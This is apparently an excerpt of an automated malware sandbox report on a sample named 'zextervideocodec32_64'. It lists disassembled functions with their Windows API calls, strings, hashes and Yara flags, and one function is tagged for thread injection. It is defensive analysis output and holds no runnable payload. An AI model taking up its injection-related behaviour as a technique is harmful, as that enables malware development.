                                                                                                      • TlsGetValue.KERNEL32(0000002B,C802D0CE,?,?,?,?,00000000,02BE6A98,000000FF,02BD21AA), ref: 02BD1F4A
                                                                                                      • TlsSetValue.KERNEL32(0000002B,02BD21AA,?,?,00000000), ref: 02BD1FB7
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BD1FE1
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 02BD1FE4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: HeapValue$FreeProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1812714009-0
                                                                                                      • Opcode ID: 7bbb60cfc11546a7adf048c8c7cd1246ceec9f25fb75cda1cf4a0fad1970a337
                                                                                                      • Instruction ID: 926fcb5d8417c5084c5761e2f6df2f95b7de4754fd04ce690f1796ae14e03719
                                                                                                      • Opcode Fuzzy Hash: 7bbb60cfc11546a7adf048c8c7cd1246ceec9f25fb75cda1cf4a0fad1970a337
                                                                                                      • Instruction Fuzzy Hash: 9051F371904384DFDB20CF68D444B96BBE5FF48364F4986A9F8199B292E731EC00CB90
                                                                                                      Function 02BE5660 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 02BE5770
                                                                                                      • __FindPESection.LIBCMT ref: 02BE578A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                                                      • String ID:
                                                                                                      • API String ID: 876702719-0
                                                                                                      • Opcode ID: c47a19ce593951a68aaf5520fedb7321de3b693e9c3c9372bd0cb765f64585ec
                                                                                                      • Instruction ID: 5bb012faa26b018a81f90c930f8dd7c3c2c8d280811867cdcd1f940e18036030
                                                                                                      • Opcode Fuzzy Hash: c47a19ce593951a68aaf5520fedb7321de3b693e9c3c9372bd0cb765f64585ec
                                                                                                      • Instruction Fuzzy Hash: D5A19F75E002158FCF31CF58D9807A9B7B5FB44368F9546E9ED56AB241EB31E802CBA0
                                                                                                      Function 0040670E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040674D
                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 00406767
                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040679B
                                                                                                      • MultiByteToWideChar.KERNEL32(00406317,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004067D3
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406829
                                                                                                      • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040683B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852931651-0
                                                                                                      • Opcode ID: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                                                                      • Instruction ID: 7abba187aa9a424c0dbe6a0d425d95b5373609879485ba3de4d3a8f21a169ece
                                                                                                      • Opcode Fuzzy Hash: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                                                                      • Instruction Fuzzy Hash: 11418D72901209EFCF209F94CD85EAF3B79FB04754F11453AF912F2290D73989608B99
                                                                                                      Function 02BC1C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BC1CB1
                                                                                                      • CloseHandle.KERNEL32(?), ref: 02BC1CBA
                                                                                                      • InterlockedExchangeAdd.KERNEL32(02BF7274,00000000), ref: 02BC1CC6
                                                                                                      • TerminateThread.KERNEL32(?,00000000), ref: 02BC1CD4
                                                                                                      • QueueUserAPC.KERNEL32(02BC1E7C,?,00000000), ref: 02BC1CE1
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02BC1CEC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 1946104331-0
                                                                                                      • Opcode ID: a52adc102918783837787ab224311d20c34b22d27f33bcfa0c710ac0037feede
                                                                                                      • Instruction ID: 7f90db23f3321d5df3b55d6c76e79d411907705b7e161959475991486c524a25
                                                                                                      • Opcode Fuzzy Hash: a52adc102918783837787ab224311d20c34b22d27f33bcfa0c710ac0037feede
                                                                                                      • Instruction Fuzzy Hash: 83F08C31950204FFDB205B9AED0DC5BFBBCEB85720B10469DF66AD6191DF60A910EB60
                                                                                                      Function 00403EAC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetVersionExA.KERNEL32 ref: 00403ECB
                                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F00
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403F60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                      • API String ID: 1385375860-4131005785
                                                                                                      • Opcode ID: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                                                                      • Instruction ID: b9728f854654bad712525c43123df79641ae2587965f18a3091eb02ea7af310c
                                                                                                      • Opcode Fuzzy Hash: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                                                                      • Instruction Fuzzy Hash: 42312771D002896DEB319A309C45BDA7F7C9B12309F2400FBE545F52C2D6398F8A8718
                                                                                                      Function 02BD1910 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::exception::exception.LIBCMT ref: 02BD195F
                                                                                                        • Part of subcall function 02BD24B3: std::exception::_Copy_str.LIBCMT ref: 02BD24CC
                                                                                                        • Part of subcall function 02BD0D30: __CxxThrowException@8.LIBCMT ref: 02BD0D8E
                                                                                                      • std::exception::exception.LIBCMT ref: 02BD19BE
                                                                                                      Strings
                                                                                                      • boost unique_lock has no mutex, xrefs: 02BD194E
                                                                                                      • boost unique_lock owns already the mutex, xrefs: 02BD19AD
                                                                                                      • $, xrefs: 02BD19C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                                      • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                                      • API String ID: 2140441600-46888669
                                                                                                      • Opcode ID: 9a8cccc288ead1d49ad1386fdaf8669c6383d27eeb0e3e7e01af88dd9edb1470
                                                                                                      • Instruction ID: d553e64c6f2408d3beda856df436d7c4684d10847873ac824ee50a0e2aa1c9f9
                                                                                                      • Opcode Fuzzy Hash: 9a8cccc288ead1d49ad1386fdaf8669c6383d27eeb0e3e7e01af88dd9edb1470
                                                                                                      • Instruction Fuzzy Hash: DA21F7B15187809FD720DF24C55479BBBE5AB88708F404E9EF5A687250E7B99408CF92
                                                                                                      Function 02BD4A5C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __getptd_noexit.LIBCMT ref: 02BD4A60
                                                                                                        • Part of subcall function 02BD5C52: GetLastError.KERNEL32(75920A60,7591F550,02BD5E40,02BD3013,7591F550,?,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5C54
                                                                                                        • Part of subcall function 02BD5C52: __calloc_crt.LIBCMT ref: 02BD5C75
                                                                                                        • Part of subcall function 02BD5C52: __initptd.LIBCMT ref: 02BD5C97
                                                                                                        • Part of subcall function 02BD5C52: GetCurrentThreadId.KERNEL32 ref: 02BD5C9E
                                                                                                        • Part of subcall function 02BD5C52: SetLastError.KERNEL32(00000000,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5CB6
                                                                                                      • __calloc_crt.LIBCMT ref: 02BD4A83
                                                                                                      • __get_sys_err_msg.LIBCMT ref: 02BD4AA1
                                                                                                      • __invoke_watson.LIBCMT ref: 02BD4ABE
                                                                                                      Strings
                                                                                                      • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02BD4A6B, 02BD4A91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                                      • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                      • API String ID: 109275364-798102604
                                                                                                      • Opcode ID: 7bb36bbb6e6488bfc383ef3f4d48deb2516252cdc9933653cf64e496cb2ea453
                                                                                                      • Instruction ID: c9762ef618dbb3f87351b189288191498eb35fa1963e09b9dee193624d74b0e4
                                                                                                      • Opcode Fuzzy Hash: 7bb36bbb6e6488bfc383ef3f4d48deb2516252cdc9933653cf64e496cb2ea453
                                                                                                      • Instruction Fuzzy Hash: 0AF0E932500B156BEB31A66A9C406EB72EDDF407A1B4104E6F96D96201FB31DC006698
                                                                                                      Function 02BC2341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                                                      • GetLastError.KERNEL32 ref: 02BC237A
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                      • String ID: pqcs
                                                                                                      • API String ID: 1619523792-2559862021
                                                                                                      • Opcode ID: 3b95c86ce18cca032a65fc24aee5655aab886a0cfdee87137ebda991ba91978c
                                                                                                      • Instruction ID: 079e68f0a731e35f985f0983e880eae565d89e90af837a305c5e26f7b3812235
                                                                                                      • Opcode Fuzzy Hash: 3b95c86ce18cca032a65fc24aee5655aab886a0cfdee87137ebda991ba91978c
                                                                                                      • Instruction Fuzzy Hash: 88F03071940304AFDF20AF74A809BABBBACEB80741F1045AAEC06D7141EB7099149B91
                                                                                                      Function 02BC4030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4035
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC4042
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC4049
                                                                                                      • std::exception::exception.LIBCMT ref: 02BC4063
                                                                                                        • Part of subcall function 02BCA6A0: __EH_prolog.LIBCMT ref: 02BCA6A5
                                                                                                        • Part of subcall function 02BCA6A0: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA6B4
                                                                                                        • Part of subcall function 02BCA6A0: __CxxThrowException@8.LIBCMT ref: 02BCA6D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 3112922283-2104205924
                                                                                                      • Opcode ID: 76ebbf540c02a5cbd7b2305a3e779d2339f48fca082241a007bd2a7878711dc0
                                                                                                      • Instruction ID: 5869904e481d8fc8f2f0e9e2a9e82b0c4ec66e20561d6307164401ae531bde26
                                                                                                      • Opcode Fuzzy Hash: 76ebbf540c02a5cbd7b2305a3e779d2339f48fca082241a007bd2a7878711dc0
                                                                                                      • Instruction Fuzzy Hash: F6F08CB2E40209EBDF10EFE0D818BFFBB79EB04704F4045D9E916A6681DB7452158F91
                                                                                                      Function 00403CD4 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403D2D
                                                                                                      • GetFileType.KERNEL32(00000800), ref: 00403DD3
                                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00403E2C
                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00403E3A
                                                                                                      • SetHandleCount.KERNEL32 ref: 00403E71
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                                      • String ID:
                                                                                                      • API String ID: 1710529072-0
                                                                                                      • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                                      • Instruction ID: 0b7b95883a4e689196e32d1b42849a04f4efe08137134e81777c7f486c9ce5ca
                                                                                                      • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                                      • Instruction Fuzzy Hash: 025125716046458BD7218F38CE847667FA8AF11722F15437AE4A2FB3E0C7389A45CB8D
                                                                                                      Function 02BD1C60 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD1A30: CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD1A81
                                                                                                        • Part of subcall function 02BD1A30: WaitForSingleObject.KERNEL32(?,000000FF,C802D0CE,?,?,?,?,C802D0CE,02BD1A03,C802D0CE), ref: 02BD1A98
                                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD1CFE
                                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD1D1E
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02BD1D57
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02BD1DAB
                                                                                                      • SetEvent.KERNEL32(?), ref: 02BD1DB2
                                                                                                        • Part of subcall function 02BC418C: CloseHandle.KERNEL32(00000000,?,02BD1CE5), ref: 02BC41B0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 4166353394-0
                                                                                                      • Opcode ID: 1f9f43ea0ce04f1be4ad0ea1106975c8eacc1797db9739c4912cd424e8b26feb
                                                                                                      • Instruction ID: 445d0673f4abcec9c5d75116675c209aa1839a1a71c8f7f163c386191be05686
                                                                                                      • Opcode Fuzzy Hash: 1f9f43ea0ce04f1be4ad0ea1106975c8eacc1797db9739c4912cd424e8b26feb
                                                                                                      • Instruction Fuzzy Hash: 4E41EF716103118BEF259F2CCC80BABB7A4EF45724F2446E8EC1ADB395E734D8118BA5
                                                                                                      Function 02BC207C Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611172436-0
                                                                                                      • Opcode ID: 84be0ce62303c069eb01cc2b90f6a3e36305656fde87ca3fdbe23e95e5bc0d72
                                                                                                      • Instruction ID: f67d19c458c68778da99b55002a47f268843c190f4ed3fb0ec0cad18fe898db9
                                                                                                      • Opcode Fuzzy Hash: 84be0ce62303c069eb01cc2b90f6a3e36305656fde87ca3fdbe23e95e5bc0d72
                                                                                                      • Instruction Fuzzy Hash: 64319C72504701AFC711DF25C884A6BB7F9FFC8664F200A5EF89683650DB30E946CB91
                                                                                                      Function 02BCE0CE Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE0D3
                                                                                                        • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCE152
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BCE16E
                                                                                                      • InterlockedIncrement.KERNEL32(02BF5190), ref: 02BCE193
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BCE1A8
                                                                                                        • Part of subcall function 02BC27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02BC284E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                                      • String ID:
                                                                                                      • API String ID: 1578506061-0
                                                                                                      • Opcode ID: f45c17a1078bebe24e4dd5d0cb6a8c285b3c204ce578da111b01174e555ac6c7
                                                                                                      • Instruction ID: a1de0de4106a33046c99d63601f9540c75d71ef70914b3f56d95885d25f16a63
                                                                                                      • Opcode Fuzzy Hash: f45c17a1078bebe24e4dd5d0cb6a8c285b3c204ce578da111b01174e555ac6c7
                                                                                                      • Instruction Fuzzy Hash: 013128B1901245DFDB10DF68D5446AEBBF8FF08310F14859EE44AE7641E774A615CFA0
                                                                                                      Function 02BE0384 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 02BE0390
                                                                                                        • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
                                                                                                        • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
                                                                                                        • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
                                                                                                      • _free.LIBCMT ref: 02BE03A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1020059152-0
                                                                                                      • Opcode ID: 0c4275cf0c5f9ca24ae9b22ab0685de15f3c56dbe7ce9e444656795deb116d96
                                                                                                      • Instruction ID: 477a662973d38b2b6463bdb0c50a6ad8e15b776f831955eb0bd2f75da260d034
                                                                                                      • Opcode Fuzzy Hash: 0c4275cf0c5f9ca24ae9b22ab0685de15f3c56dbe7ce9e444656795deb116d96
                                                                                                      • Instruction Fuzzy Hash: FC11C672948711ABDF313F70A8447DA3B9ADF083A1B108DE5E94BAB140EF70C4919B90
                                                                                                      Function 02BC21D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC21DA
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21ED
                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02BC2224
                                                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02BC2237
                                                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02BC2261
                                                                                                        • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                                                        • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                                                        • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                                                        • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1856819132-0
                                                                                                      • Opcode ID: 54856e85d4f2640f44cc34c6e21955d844053808f33cbf27423b35b569689ad0
                                                                                                      • Instruction ID: 28cae3f67f23bcf2bc9b7e8afb96cc15847e74b73801f83e4f1338e87f789420
                                                                                                      • Opcode Fuzzy Hash: 54856e85d4f2640f44cc34c6e21955d844053808f33cbf27423b35b569689ad0
                                                                                                      • Instruction Fuzzy Hash: A9117F72D40114EBCF11EFA8D804AAEFFBAFB44350F10459EE85597260DB714661EF90
                                                                                                      Function 02BC2298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC229D
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC22B0
                                                                                                      • TlsGetValue.KERNEL32 ref: 02BC22E7
                                                                                                      • TlsSetValue.KERNEL32(?), ref: 02BC2300
                                                                                                      • TlsSetValue.KERNEL32(?,?,?), ref: 02BC231C
                                                                                                        • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                                                        • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                                                        • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                                                        • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1856819132-0
                                                                                                      • Opcode ID: eb8ba08a4340594e6f123d5562401caf34461e2c5030efc34b956587c4ef34a1
                                                                                                      • Instruction ID: fb70a5ef67b95d18161945328ee71319d558e93c9763f353bf093ef507ec38a2
                                                                                                      • Opcode Fuzzy Hash: eb8ba08a4340594e6f123d5562401caf34461e2c5030efc34b956587c4ef34a1
                                                                                                      • Instruction Fuzzy Hash: 1B115E72D00118EBCF12EFA8D8449AEFFBAEF44350F10459EE815A3211DB714A61DF90
                                                                                                      Function 02BCBCE8 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BCB13B: __EH_prolog.LIBCMT ref: 02BCB140
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BCBD05
                                                                                                        • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02BF1DB4,?,00000001), ref: 02BCBD1B
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BCBD2E
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02BF1DB4,?,00000001), ref: 02BCBD3E
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCBD4C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
